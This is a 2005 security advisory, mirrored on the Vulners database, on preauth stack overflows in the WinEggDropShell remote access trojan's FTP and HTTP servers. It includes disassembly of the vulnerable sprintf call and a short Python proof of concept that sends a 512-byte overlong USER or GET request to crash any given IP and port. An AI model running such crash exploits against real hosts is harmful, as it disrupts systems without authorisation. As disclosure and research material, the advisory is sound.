Vulners
Lucene search
AD20051202.txt
`WinEggDropShell Multiple Remote Stack Overflow
by Sowhat
2005.12.02
http://secway.org/advisory/AD20051202.txt
http://secway.org/exploit/wineggdropshell_bof.py.txt
Affected:
WinEggDropShell Eterntiy version (1.7)
Other version may be vulnerable toooooo
Overview:
WinEggDropShell is a popular Chinese RAT (remote access trojan).
WineggDropShell provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server.
for more information, Goooooooooooooogle...
Multiple preauth stack overflow found in the HTTP/FTP server can be used to
execute arbitrary command or D0S (blue screen, yes, it's cool ;)
Vulnerability:
1. FTP USER bof
.text:100027BD push offset aUser ; "USER"
.text:100027C2 call _strlen
.text:100027C7 add esp, 4
.text:100027CA lea edi, [ebp+eax-103h]
.text:100027D1 push edi
.text:100027D2 push offset aS ; "%s"
.text:100027D7 lea edi, [ebp+var_208]
.text:100027DD push edi ; char *
.text:100027DE call _sprintf ; emmmmm, ;)
_ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is
a 0x104h buffer.
2. FTP Server Pass Command
.............
3. HTTP GET stack overflow!
GET /A*260
PoC:
http://secway.org/exploit/wineggdropshell_bof.py.txt
Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
Reference:
[1] https://www.openrce.org/articles/full_view/18
[2] http://www.ccc.de/congress/2005/
[3] http://secway.org
#!/usr/bin/python
# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET" && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11
# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo
import sys
import string
import socket
if (len(sys.argv) != 4):
print "##########################################################################"
print "# WinEggDropShell Multipe PreAuth Remote Stack Overflow
PoC #"
print "# This Poc will BOD the vulnerable target
#"
print "# Bug Discoverd and coded by Sowhat
#"
print "# http://secway.org
#"
print "##########################################################################"
print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80"
print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21"
sys.exit(0)
host = sys.argv[2]
port = string.atoi(sys.argv[3])
if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):
request = "USER " + 'A'*512 + "\r"
if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):
request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)
---EOF-----
--
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2005 00:00Current
7.4High risk
Vulners AI Score7.4